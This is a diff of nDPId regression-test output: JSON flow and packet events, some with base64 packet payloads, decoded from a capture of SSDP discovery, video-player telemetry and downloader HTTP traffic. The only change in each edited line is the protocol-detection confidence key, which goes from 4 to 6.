00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1467353180443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353180443,"pkt":"ABxCjnAxTF4M6gNlCABFAAC501VAADMGZuDKbA7swKhzCABQxUZksP7LoYaTxFAYACF90QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjE5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1467353180830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353180830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUgAAAQRyyvAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1467353181295,"pkt":"TF4M6gNlKDc3Alz6CABFAAE99F1AAEAGPTfAqAUPROn9hf5oAFDPYUlYxJOK\/oAYEBX74gAAAQEICiYb7H8rI43TR0VUIC9jb21NYWdpY2FuQXBpL2NvbXBvc2l0ZS9hcHAucGhwL0dsb2JhbC9JbmRleC9pcCBIVFRQLzEuMQ0KSG9zdDogYXBpLm1hZ2ljYW5zb2Z0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtdHcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXNlci1BZ2VudDogTWFnaWNhbiAodW5rbm93biB2ZXJzaW9uKSBDRk5ldHdvcmsvNzIwLjUuNyBEYXJ3aW4vMTQuNS4wICh4ODZfNjQpDQoNCg=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 
00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1467353181515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353181515,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4BFJAADUGOAhE6f2FwKgFDwBQ\/mjEk4r+z2FKYYAYABs0tgAAAQEICisjjrEmG+x\/SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6NDcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1467353182046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353182046,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6IAAAER3+HAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1467353183830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353183830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUkAAAQRyyrAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1467353185047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353185047,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6MAAAER3+DAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353185940,"pkt":"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"} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1467353186002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353186002,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5ehdAADMGwC\/KbA7bwKhzCABQxUdzEkFurBLg+VAYADiXAQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1467353186830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353186830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUoAAAQRyynAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1467353187172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353187172,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAgsAAAERAYPAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353189325,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LaNAAIAGT77AqHMI3xpqE8VJAFB9cer6SbS1WFAYQTc4sgAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkZXIuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IERvd25sb2FkZXINCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1467353189328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":566,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":566,"pkt_l4_len":532,"thread_ts_msec":1467353189328,"pkt":"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"} 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1467353189360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1467353189360,"pkt":"TF4M6gNlABxCjnAxCABFAAC8LbBAAIAGT63AqHMI3xpqE8VJAFB9ceuKSbS3WFAYQLejygAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL0Rvd25sb2FkSGVscGVyLmRsbCBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZGVyDQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353189363,"pkt":"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"} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
